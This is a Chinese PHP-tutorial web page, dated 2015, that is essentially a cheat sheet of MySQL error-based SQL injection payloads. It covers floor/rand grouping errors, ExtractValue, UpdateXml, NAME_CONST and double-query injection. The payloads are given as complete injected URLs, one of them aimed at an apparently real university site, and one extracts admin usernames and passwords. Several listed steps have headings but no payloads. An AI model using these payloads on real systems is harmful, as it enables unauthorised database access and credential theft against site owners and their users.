来源:自学PHP网 时间:2015-04-15 15:00 作者: 阅读:次
[导读] 1、通过floor暴错 *数据库版本* http: www 2cto com sql php?id=1+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema tables...
|
1、通过floor暴错 /*数据库版本*/ http://www.2cto.com/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) /*简单办法暴库*/ http://www.2cto.com/sql.php?id=info() /*连接用户*/ http://www.2cto.com/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) /*连接数据库*/ /*暴库*/ /*暴表*/ /*暴字段*/ /*暴内容*/ 2、ExtractValue(有长度限制,最长32位) http://www.2cto.com/sql.php?id=1+and extractvalue(1, concat(0x7e, (select @@version),0x7e)) 3、UpdateXml(有长度限制,最长32位) http://www.2cto.com/sql.php?id=1+and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1) http://www.2cto.com/sql.php?id=1+and updatexml(1,concat(0x7e,(SELECT distinct concat(0×23,username,0x3a,password,0×23) FROM admin limit 0,1),0x7e),1) 4、NAME_CONST(适用于低版本) http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)– 5、Error based Double Query Injection /*数据库版本*/ http://www.2cto.com/sql.php?id=1+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
